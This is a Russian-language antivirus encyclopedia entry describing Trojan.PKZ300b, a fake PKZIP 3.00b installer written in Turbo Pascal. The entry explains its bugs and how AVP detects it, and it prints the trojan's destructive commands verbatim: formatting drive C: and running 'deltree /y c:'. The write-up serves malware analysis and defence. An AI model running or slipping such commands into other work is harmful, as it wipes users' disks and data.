Родительский класс: TrojWare
Вредоносные программы, которые осуществляют несанкционированные пользователем действия: уничтожают, блокируют, модифицируют или копируют информацию, нарушают работу компьютеров или компьютерных сетей. В отличие от вирусов и червей, представители этой категории не умеют создавать свои копии, не способны к самовоспроизведению.Класс: Trojan
Вредоносная программа, занимающаяся уничтожением, блокированием, модификацией или копированием информации, нарушением работы компьютеров или компьютерных сетей, и при этом не попавшая ни в один из классов троянских программ.Подробнее
Платформа: Win32
Win32 - платформа, управляемая операционной системой на базе Windows NT (Windows XP, Windows 7 и т.д.), позволяющей исполнять 32-битные приложения. В настоящее время данная платформа является одной из наиболее распространенных.Описание
Technical Details
Представляет из себя self-extracting (Zip2Exe) архив с именем PKZ300B.EXE и длиной 178981 байт. Внутри архива - 5 файлов:
имя файла длина что внутри --------- ----- ---------- PKZINST.EXE 5328 сам троянец WHATSNEW.300 2417 WhatsNew из PkZip 2.04c, все строки "2.04c" заменены на "3.0" COMPRESS.000 124005 ARJ 2.41, плюс экстра-данные COMPRESS.001 116260 ARJ 2.41 сам по себе FILE_ID.DIZ 101 DOC-файл, говорит про этот архив, что он - Pkzip 3.00b.
Троянцем является единственный файл - PKZINST.EXE. Hаписан он на TurboPascal. При запуске выводит текст:
PKZIP (R) Install Utility Version 3.00b 4-05-950 Copr. 1989-1995 Pkware Inc. All Rights Reserved. Pkzip Reg. U.S. Pat. and Tm. Off.
Initializing, this may take a few minutes....
и выполняет две команды:
COMMAND.COM /C Format c: > NULL COMMAND.COM /C deltree /y c: > NULL
К счастью, автору троянца не хватило ума сделать троянца без ошибок, и троянец затыкается на первой же команде - DOS ждет ответа на стандартный запрос:
WARNING: ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST! Proceed with Format (Y/N)?
Причем самого этого запроса на экране не видно. Hе дай бог, конечно же, нажать "Y" или "N". Если "Y", то пойдет формат диска C:, если "N", то пойдет работать DELTREE. Однако естественное желание при виде заснувшей программы - нажать Reset или Ctrl-C/Break. В обоих случаях троянец отрубается безо всякой потери данных, а если выход произошел по Ctrl-C, то он еще вякнет напоследок:
Thanks for waiting, moron. You shouldn't have fucked with us.
и вываливается в DOS. Так что, благодаря этой ошибке юзер может спать спокойно и не бояться новых версий PKZip. Плюс к тому: в троянце есть еще одна ошибка. Перенаправление "> NULL" создает на диске файл NULL, а автор троянца видимо, хотел отключить посторонний вывод на экран перенаправлением "> NUL". Судя по всему сие [юное] дарование читает DOS User's Guide и еще не дошло до буквы 'N' в алфавитном списке команд DOS. AVP ловит этого троянца под именем "Trojan.PKZ300b" как в распакованном файле, так и в self-extracting архиве.
Смотрите также
Узнай статистику распространения уязвимостей в своем регионе statistics.securelist.com